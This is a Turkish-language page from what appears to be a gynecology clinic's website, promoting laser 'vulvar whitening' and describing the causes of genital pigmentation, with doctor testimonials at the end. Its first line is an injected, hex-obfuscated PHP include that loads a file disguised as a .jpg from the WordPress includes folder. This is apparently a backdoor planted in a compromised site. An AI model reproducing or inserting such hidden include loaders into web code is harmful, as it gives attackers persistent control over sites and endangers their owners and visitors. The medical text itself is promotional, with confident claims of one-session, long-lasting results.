@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); Vulvar Beyazlatma – Kadın Hastalıkları ve Doğum Uzmanı
tedaviler_vulvar_beyazlatma

Vulva Beyazlatma

Kadın dış genital olarak adlandırılan vulva, yapısal olarak veya sonradan normalden fazla pigmentasyon ihtiva edebilir. Bu durumun sağlık açısından herhangi bir sakıncası yoktur. Ancak estetik kaygılarla bu durumdan mutlu olmayan hastalar olabilmektedir.

Lazerle bu durum tek seansta tatminkar bir şekilde düzeltilebilmektedir. İşlem herhangi bir ön hazırlık gerektirmez, anestezi gerektirmez. Uygulama kolaydır. Oluşturulan beyazlatma çok uzun süre kalıcıdır.

Vulva yaşa ve hormonal sebeplere bağlı olarak renk değişimine uğrayabilir. Bu duruma etken olan ana hormon estrojen hormonudur.  Estrojen hormonu açısından zengin olan vulva, güneş ışınlarının UV etkisi altında koyulaşabilmektedir.

Kadınların pek çoğunda gebelik esnasında artan estrojen hormonları yüzünden oluşan renk değişimleri kalıcı olmaktadır.

Gebelik dışında doğum kontrol tabletleri, polikistik over sendromu, hormonal sorunlar, cilt hastalıkları dış genital alanda renk değişimine sebeptir. Ayrıca bazı kişilerde genetik sebepler de etkili olmaktadır.

Bazı kişilerde genital bölgeye yapılan epilasyonu amacıyla uygulanan lazer uygulamaları renk değişimine sebep olmaktadır.

Er-Yag laserle tedavisi mümkündür. Lazerle genital alan renk açma ‘labial whitening’ veya ‘vulvar whitening’ olarak da bilinmektedir.

Doktora Sorun

* alanları doldurmanız zorunludur
  • dr2
    "Non-invaziv olmasının yanı sıra, IncontiLase’in temel avantajı ayakta tedavi prosedürüyle uygulanabilmesidir. Bu da hastalardaki ekonomik yükü azaltıyor."
    Dr. Urska Bizjak Ogrinc
  • dr1
    IncontiLasetedavisini takip eden bir yıl içinde SUI tanısı koyulan hastaların %77’sinde iyileşme görüldü.
    Dr. Sabina Sencar